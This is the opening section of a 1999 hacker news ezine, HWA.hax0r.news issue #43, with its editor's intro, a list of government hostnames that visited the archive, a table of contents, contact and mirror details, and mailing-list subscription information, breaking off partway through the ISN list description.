💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › HWA › hwa-hn43.… captured on 2022-01-08 at 16:00:54.
⬅️ Previous capture (2021-12-04)
-=-=-=-=-=-=-
[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 43 Volume 1 1999 Nov 21st 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
Shit a week late again, another fucking cold, man I hate colds! fuck,
anyway this issue covers Nov 14th - Nov 21st #44 will cover Nov 22nd to
Nov 28th. Seen?
==========================================================================
"ABUSUS NON TOLLIT USUM"
==========================================================================
Today the spotlight may be on you, some interesting machines that
have accessed these archives recently...
_ _ _ _
| | | (_) |
| |__| |_| |_ ___
| __ | | __/ __|
| | | | | |_\__ \
|_| |_|_|\__|___/
homer.nawcad.navy.mil
maggie.nawcad.navy.mil
lisa.nawcad.navy.mil
msproxy.transcom.mil
b-kahuna.hickam.af.mil
sc034ws109.nosc.mil
infosec.se
gate2.mcbutler.usmc.mil
sc034ws109.nosc.mil
shq-ot-1178.nosc.mil
dhcp-036190.scott.af.mil
mcreed.lan.teale.ca.gov
dodo.nist.gov
kwai11.nsf.gov
enduser.faa.gov
vasfw02,fdic.gov
lisa.defcen.gov.au
ps1.pbgc.gov
guardian.gov.sg
amccss229116.scott.af.mil
sc022ws224.nosc.mil
sheppard2.hurlburt.af.mil
marshall.us-state.gov
digger1.defence.gov.au
firewall.mendoza.gov.ar
ipaccess.gov.ru
gatekeeper.itsec-debis.de
fgoscs.itsec-debis.de
fhu-ed4ccdf.fhu.disa.mil
citspr.tyndall.af.mil
kelsatx2.kelly.af.mil
kane.sheppard.af.mil
relay5.nima.mil
host.198-76-34-33.gsa.gov
ntsrvr.vsw.navy.mil
saic2.nosc.mil
wygate.wy.blm.gov
mrwilson.lanl.gov
p722ar.npt.nuwc.navy.mil
ws088228.ramstein.af.mil
car-gw.defence.gov.au
unknown-c-23-147.latimes.com
nytgate1.nytimes.com
There are some interesting machines among these, the *.nosc.mil boxes are
from SPAWAR information warfare centres, good to see our boys keeping up
with the news... - Ed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
http://welcome.to/HWA.hax0r.news/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
Web site sponsored by CUBESOFT networks http://www.csoft.net
check them out for great fast web hosting!
http://www.csoft.net/~hwa
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
The Hacker's Ethic
Sadly, due to the traditional ignorance and sensationalizing of the mass
media, the once-noble term hacker has become a perjorative.
Among true computer people, being called a hacker is a compliment. One of
the traits of the true hacker is a profoundly antibureaucratic and
democratic spirit. That spirit is best exemplified by the Hacker's Ethic.
This ethic was best formulated by Steven Levy in his 1984 book Hackers:
Heroes of the Computer Revolution. Its tenets are as follows:
1 - Access to computers should be unlimited and total.
2 - All information should be free.
3 - Mistrust authority - promote decentralization.
4 - Hackers should be judged by their hacking not bogus criteria such as
degrees, age, race, or position.
5 - You create art and beauty on a computer,
6 - Computers can change your life for the better.
The Internet as a whole reflects this ethic.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
A Comment on FORMATTING:
Oct'99 - Started 80 column mode format, code is still left
untouched since formatting will destroy syntax.
I received an email recently about the formatting of this
newsletter, suggesting that it be formatted to 75 columns
in the past I've endevoured to format all text to 80 cols
except for articles and site statements and urls which are
posted verbatim, I've decided to continue with this method
unless more people complain, the zine is best viewed in
1024x768 mode with UEDIT.... - Ed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
New mirror sites
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://net-security.org/hwahaxornews
http://www.sysbreakers.com/hwa
http://www.attrition.org/hosted/hwa/
http://www.ducktank.net/hwa/issues.html.
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/
* Crappy free sites but they offer 20M & I need the space...
** Some issues are not located on these sites since they exceed
the file size limitations imposed by the sites :-( please
only use these if no other recourse is available.
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
thanks to airportman for the Cubesoft bandwidth. Also shouts out to all
our mirror sites! and p0lix for the (now expired) digitalgeeks archive
tnx guys.
http://www.csoft.net/~hwa
HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa. *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.projectgamma.com/archives/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
SYNOPSIS (READ THIS)
--------------------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #43
=-----------------------------------------------------------------------=
We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop
by and idle a while and say hi...
**************************************************************************
____| _| |
__| | __ \ _ \ __|
| __| | | __/ |
_____|_| _| _|\___|\__|
Eris Free Net #HWA.hax0r.news
**************************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed ***
*** ***
*** please join to discuss or impart news on from the zine and around ***
*** the zine or just to hang out, we get some interesting visitors you ***
*** could be one of em. ***
*** ***
*** Note that the channel isn't there to entertain you its purpose is ***
*** to bring together people interested and involved in the underground***
*** to chat about current and recent events etc, do drop in to talk or ***
*** hangout. Also if you want to promo your site or send in news tips ***
*** its the place to be, just remember we're not #hack or #chatzone... ***
**************************************************************************
=--------------------------------------------------------------------------=
_____ _ _
/ ____| | | | |
| | ___ _ __ | |_ ___ _ __ | |_ ___
| | / _ \| '_ \| __/ _ \ '_ \| __/ __|
| |___| (_) | | | | || __/ | | | |_\__ \
\_____\___/|_| |_|\__\___|_| |_|\__|___/
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
ABUSUS NON TOLLIT USUM?
This is (in case you hadn't guessed) Latin, and loosely translated
it means "Just because something is abused, it should not be taken
away from those who use it properly). This is our new motto.
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Bubbleboy email worm description.................................
04.0 .. WinNT.Infis.4608 new Win NT virus................................
05.0 .. OSALL Interview with Flipz 1st person to deface a Microsoft site.
06.0 .. Online encrypted privacy for email and WWW.......................
07.0 .. More on the Chris Buckley Saga...................................
08.0 .. Security Practices Today, Or Lack Thereof .......................
09.0 .. Internet Wiretapping Still a Possibility ........................
10.0 .. Stock Prices Manipulated in China ...............................
11.0 .. Rumours: Vent of level Seven raided by FBI ......................
12.0 .. Electronic Information Stolen from Egypt ........................
13.0 .. Aleph One Gives NPR Interview ...................................
14.0 .. South American Con Announced ....................................
15.0 .. New Ezines Released .............................................
16.0 .. BO2K Marketing Plan (Very funny reading, check this out).........
17.0 .. Canada Loses Classified Documents ...............................
18.0 .. Guilty Plea in Media City Defacement ............................
19.0 .. Hong Kong's Department of Highways Defaced ......................
20.0 .. You Have No Privacy Anyway (scary) ..............................
21.0 .. ACLU to Monitor Echelon .........................................
22.0 .. NSA Gets Patent on Analyzing Speech .............................
23.0 .. New Ezine and Web Site - PrivacyPlace Launches ..................
24.0 .. Vendor Response Archive .........................................
25.0 .. Another from Cuartango: More Microsoft Security Holes ...........
26.0 .. DOD helps Local Cops in Fighting CyberCrime .....................
27.0 .. BSA Busts IRC Pirates ...........................................
28.0 .. US Concerned About Chinese Statements ...........................
29.0 .. The state of the net in Bulgaria.................................
30.0 .. More on the PIII chip ID.........................................
31.0 .. Security Lawsuits Next After Y2K ................................
32.0 .. Another Singaporean Cyber Intruder Pleads Guilty ................
33.0 .. SingCERT Releases Year to Date Stats ............................
34.0 .. Canadian Telecom Firm Gets Security Clearance ...................
35.0 .. Dell Gets Some FunLove ..........................................
36.0 .. Melissa Hits Disney .............................................
37.0 .. How the Anti Virus Industry Works ...............................
38.0 .. FBI Releases Anti Cyber Crime Video .............................
39.0 .. Adobe Introduces Potentially Flawed Security System .............
40.0 .. The 'Enemy' Speaks at Security Conference .......................
41.0 .. Defense Fund Started for Warez4Cable + interviews................
42.0 .. Menwith Hill To Get Upgrade Monies ..............................
43.0 .. CSIS Lost Classified Floppy Disk (hahaha)........................
44.0 .. Hitachi Chip May Prevent Use of Third-party Printer Cartridges ..
45.0 .. NEW MACRO VIRUS OUT THERE........................................
46.0 .. GLOBALNET, CROATIAN ISP COMPROMISED..............................
47.0 .. SEC FILES CHARGES................................................
48.0 .. G6 FTP SERVER v2.0 PROBLEMS......................................
49.0 .. RED HAT SECURITY ADVISORY........................................
50.0 .. HPING............................................................
51.0 .. RPM UPDATE HELPING UTILITY.......................................
52.0 .. WebBBS Ver2.13 Exploit / Shadow Penguin Security.................
53.0 .. SENATE.GOV BITES THE DUST........................................
54.0 .. NEW NESSUS.......................................................
55.0 .. DELEGATE BUFFER OVERFLOWS .......................................
56.0 .. SSH PROBLEMS.....................................................
57.0 .. TORVALDS: COUPLE OF QUESTIONS....................................
58.0 .. 2K PREPARATIONS CAUSED PROBLEMS..................................
59.0 .. IS MICROSOFT TO BLAME FOR Y2K?...................................
60.0 .. $50 MILLIONS FOR Y2K CENTER......................................
61.0 .. EYES ON EXEC 2.32................................................
62.0 .. CHECKPOINT AND LINUX.............................................
63.0 .. NOVELL SIMPLIFIES THINGS.........................................
64.0 .. RPC.NFSD PROBLEMS................................................
65.0 .. Eserv 2.50 Web interface Server Directory Traversal Vulnerability
66.0 .. RFP9906 - RFPoison...............................................
=-------------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: POSTPONED til further notice, place: TBA..........
Ha.Ha .. Humour and puzzles ............................................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
Stuff you can email:
- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net
Websites;
sAs72.......................: http://members.tripod.com/~sAs72/
Cruciphux...................: http://www.geocities.com/Area51/Lair/8913/
@HWA
00.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) .....,............http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/ *DOWN*
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
<a href="http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not
"CC" the bugtraq reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that
reproduction of those words without your permission in any medium outside the distribution of this list may be
challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I am pleased to inform you of several changes that will be occurring
on June 5th. I hope you find them as exciting as I do.
BUGTRAQ moves to a new home
---------------------------
First, BUGTRAQ will be moving from its current home at NETSPACE.ORG
to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read
below. Other than the change of domains nothing of how the list
is run changes. I am still the moderator. We play by the same rules.
Security Focus will be providing mail archives for BUGTRAQ. The
archives go back longer than Netspace's and are more complete than
Geek-Girl's.
The move will occur one week from today. You will not need to
resubscribe. All your information, including subscription options
will be moved transparently.
Any of you using mail filters (e.g. procmail) to sort incoming
mail into mail folders by examining the From address will have to
update them to include the new address. The new address will be:
BUGTRAQ@SECURITYFOCUS.COM
Security Focus also be providing a free searchable vulnerability
database.
BUGTRAQ es muy bueno
--------------------
It has also become apparent that there is a need for forums
in the spirit of BUGTRAQ where non-English speaking people
or people that don't feel comfortable speaking English can
exchange information.
As such I've decided to give BUGTRAQ in other languages a try.
BUGTRAQ will continue to be the place to submit vulnerability
information, but if you feel more comfortable using some other
language you can give the other lists a try. All relevant information
from the other lists which have not already been covered here
will be translated and forwarded on by the list moderator.
In the next couple of weeks we will be introducing BUGTRAQ-JP
(Japanese) which will be moderated by Nobuo Miwa <n-miwa@lac.co.jp>
and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A.
from Argentina <http://www.core-sdi.com/> (the folks that brought you
Secure Syslog and the SSH insertion attack).
What is Security Focus?
-----------------------
Security Focus is an exercise in creating a community and a security
resource. We hope to be able to provide a medium where useful and
successful resources such as BUGTRAQ can occur, while at the same
time providing a comprehensive source of security information. Aside
from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl
herself!) have moved over to Security Focus to help us with building
this new community. The other staff at Security Focus are largely derived
from long time supporters of Bugtraq and the community in general. If
you are interested in viewing the staff pages, please see the 'About'
section on www.securityfocus.com.
On the community creating front you will find a set of forums
and mailing lists we hope you will find useful. A number of them
are not scheduled to start for several weeks but starting today
the following list is available:
* Incidents' Mailing List. BUGTRAQ has always been about the
discussion of new vulnerabilities. As such I normally don't approve
messages about break-ins, trojans, viruses, etc with the exception
of wide spread cases (Melissa, ADM worm, etc). The other choice
people are usually left with is email CERT but this fails to
communicate this important information to other that may be
potentially affected.
The Incidents mailing list is a lightly moderated mailing list to
facilitate the quick exchange of security incident information.
Topical items include such things as information about rootkits
new trojan horses and viruses, source of attacks and tell-tale
signs of intrusions.
To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body
of:
SUBS INCIDENTS FirstName, LastName
Shortly we'll also be introducing an Information Warfare forum along
with ten other forums over the next two months. These forums will be
built and moderated by people in the community as well as vendors who
are willing to take part in the community building process.
*Note to the vendors here* We have several security vendors who have
agreed to run forums where they can participate in the online communities.
If you would like to take part as well, mail Alfred Huger,
ahuger@securityfocus.com.
On the information resource front you find a large database of
the following:
* Vulnerabilities. We are making accessible a free vulnerability
database. You can search it by vendor, product and keyword. You
will find detailed information on the vulnerability and how to fix it,
as well are links to reference information such as email messages,
advisories and web pages. You can search by vendor, product and
keywords. The database itself is the result of culling through 5
years of BUGTRAQ plus countless other lists and news groups. It's
a shining example of how thorough full disclosure has made a significant
impact on the industry over the last half decade.
* Products. An incredible number of categorized security products
from over two hundred different vendors.
* Services. A large and focused directory of security services offered by
vendors.
* Books, Papers and Articles. A vast number of categorized security
related books, papers and articles. Available to download directly
for our servers when possible.
* Tools. A large array of free security tools. Categorized and
available for download.
* News: A vast number of security news articles going all the way
back to 1995.
* Security Resources: A directory to other security resources on
the net.
As well as many other things such as an event calendar.
For your convenience the home-page can be personalized to display
only information you may be interested in. You can filter by
categories, keywords and operating systems, as well as configure
how much data to display.
I'd like to thank the fine folks at NETSPACE for hosting the
site for as long as they have. Their services have been invaluable.
I hope you find these changes for the best and the new services
useful. I invite you to visit http://www.securityfocus.com/ and
check it out for yourself. If you have any comments or suggestions
please feel free to contact me at this address or at
aleph1@securityfocus.com.
Cheers.
--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com.� To unsubscribe,
visit http://www.counterpane.com/unsubform.html.� Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier.� Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms.� He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW.� He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest��� Sun� 14 Feb, 1999�� Volume 11 : Issue 09
�����
��������������������� ISSN� 1004-042X
������ Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
������ News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
������ Archivist: Brendan Kehoe
������ Poof Reader:�� Etaion Shrdlu, Jr.
������ Shadow-Archivists: Dan Carosone / Paul Southworth
������������������������� Ralph Sims / Jyrki Kuoppala
������������������������� Ian Dickinson
������ Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--[ New ISN announcement (New!!)
Sender: ISN Mailing List <ISN@SECURITYFOCUS.COM>
From: mea culpa <jericho@DIMENSIONAL.COM>
Subject: Where has ISN been?
Comments: To: InfoSec News <isn@securityfocus.com>
To: ISN@SECURITYFOCUS.COM
It all starts long ago, on a network far away..
Not really. Several months ago the system that hosted the ISN mail list
was taken offline. Before that occured, I was not able to retrieve the
subscriber list. Because of that, the list has been down for a while. I
opted to wait to get the list back rather than attempt to make everyone
resubscribe.
As you can see from the headers, ISN is now generously being hosted by
Security Focus [www.securityfocus.com]. THey are providing the bandwidth,
machine, and listserv that runs the list now.
Hopefully, this message will find all ISN subscribers, help us weed out
dead addresses, and assure you the list is still here. If you have found
the list to be valuable in the past, please tell friends and associates
about the list. To subscribe, mail listserv@securityfocus.com with
"subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".
As usual, comments and suggestions are welcome. I apologize for the down
time of the list. Hopefully it won't happen again. ;)
mea_culpa
www.attrition.org
--[ Old ISN welcome message
[Last updated on: Mon Nov 04 0:11:23 1998]
InfoSec News is a privately run, medium traffic list that caters
to distribution of information security news articles. These
articles will come from newspapers, magazines, online resources,
and more.
The subject line will always contain the title of the article, so that
you may quickly and effeciently filter past the articles of no interest.
This list will contain:
o Articles catering to security, hacking, firewalls, new security
encryption, products, public hacks, hoaxes, legislation affecting
these topics and more.
o Information on where to obtain articles in current magazines.
o Security Book reviews and information.
o Security conference/seminar information.
o New security product information.
o And anything else that comes to mind..
Feedback is encouraged. The list maintainers would like to hear what
you think of the list, what could use improving, and which parts
are "right on". Subscribers are also encouraged to submit articles
or URLs. If you submit an article, please send either the URL or
the article in ASCII text. Further, subscribers are encouraged to give
feedback on articles or stories, which may be posted to the list.
Please do NOT:
* subscribe vanity mail forwards to this list
* subscribe from 'free' mail addresses (ie: juno, hotmail)
* enable vacation messages while subscribed to mail lists
* subscribe from any account with a small quota
All of these generate messages to the list owner and make tracking
down dead accounts very difficult. I am currently receiving as many
